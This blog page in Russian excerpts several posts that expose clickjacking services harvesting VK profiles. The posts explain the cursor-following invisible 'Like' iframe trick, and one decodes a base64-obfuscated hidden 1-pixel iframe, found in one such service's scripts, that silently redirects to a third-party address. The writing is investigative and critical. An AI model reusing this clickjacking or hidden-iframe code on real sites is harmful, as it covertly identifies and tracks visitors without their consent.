Sanasol
Для тех кто не в курсе.
Есть такая хунта как который собирает профили.
И собирает он их не совсем «белым» способом, а точнее с помощью кликжекинга(невидимый элемент на странице по которому кликает посетитель сайта).
Яндекс решил что он герой всея интернета и стал ругать сайты за использование этой технологии(опускает сайты в поиске на дно, т.е. всё СЕО и т.п. идёт в большую жопу).
Естественно магические алгоритмы определения тщательно скрываются.
Привет! Как вам новый маскот?)
Первая часть ковыряний в подобном тут: Рыболовы и реклама
Итак SocGate!
Вот уже года 2 все успешно на сайтах.
Конечно рано или поздно но встал бы вопрос, а что же с другими соц. сетями.
И он упорно задается до сих пор: Одноклассники, Facebook.
Все жаждут получать все возможные профили своих жертв клиентов.
Сперва немного теории для тех кто всё еще не знает как это работает.
При заходе на ваш сайт загружается специальный скрипт, который вставляет на страницу скрытый Iframe.
Этот iframe прозрачный 1×1 пиксель и беспощадно ведет охоту на ваш курсор, а точнее летает ровно под курсором.
Что приводит к тому что ваш любой клик так или иначе попадет в iframe.
А самое интересное внутри. В iframe засунута уникальная страница сервиса с кнопкой Like.
После того как вы сделали клик — лайкнули эту страницу.
Сервис стучит в прекрасную APIшечку VK и забирает список лайкнувших для этой страницы.
Так как страница уникальная лайк там всего один — отгадайте чей?
Так и происходит получение профилей посетителей сайтов.
(далее…)
Начал немножко осваивать AngularJS.
Конечно же лучшее место для теста это пара страниц в .
Первым делом конечно же основная страница со списком собранных профилей.
Получилось как-то так:
(далее…)
Доброго времени суток.
Недавно исследовал интересный сервис по сбору VK профилей:
Вход в сервис стоит 5000 рублей единоразово и 5 рублей за каждый собранный профиль человека.
Цель была узнать как и что работает при определении профиля человека, но речь пойдет не об этом. При тщательном ковырянии в работе скриптов нашел интересный кусок, который к определению имеет отношение примерно никакое 🙂
А нашелся собственно вот такой вот код
|
1 |
document.write('<iframe sandbox=\'allow-same-origin allow-scripts\' seamless id=\'sfrload\' src=\'data:text/html;charset=utf-8;base64,PCEtLSAtLT48c2NyaXB0IGFzeW5jPiB3aW5kb3cubG9jYXRpb24uaHJlZiA9ICJodHRwczovL3lvdTQzLnJ1L3lhbmRpbnRzaXRlLz91PWZiYjg5ZTM2YzM1OTJmMjIyMTZjZTMzM2Q4ZDFhMjUwIjsgPC9zY3JpcHQ+PCEtLSAtLT4=\' style=\'width:1px;height:1px;opacity:0;\'><\/iframe>'); |
Для тех кто не шарит: код вставляет на страницу 1 пиксельный прозрачный фрейм с таким содержанием(зашифрованным в base64)
|
1 |
<!-- --><script async> window.location.href = "https://you43.ru/yandintsite/?u=fbb89e36c3592f22216ce333d8d1a250"; </script><!-- --> |
Т.е. идет переадресация фрейма на адрес https://you43.ru/yandintsite/?u=fbb89e36c3592f22216ce333d8d1a250
И самое интересное находится по этому адресу
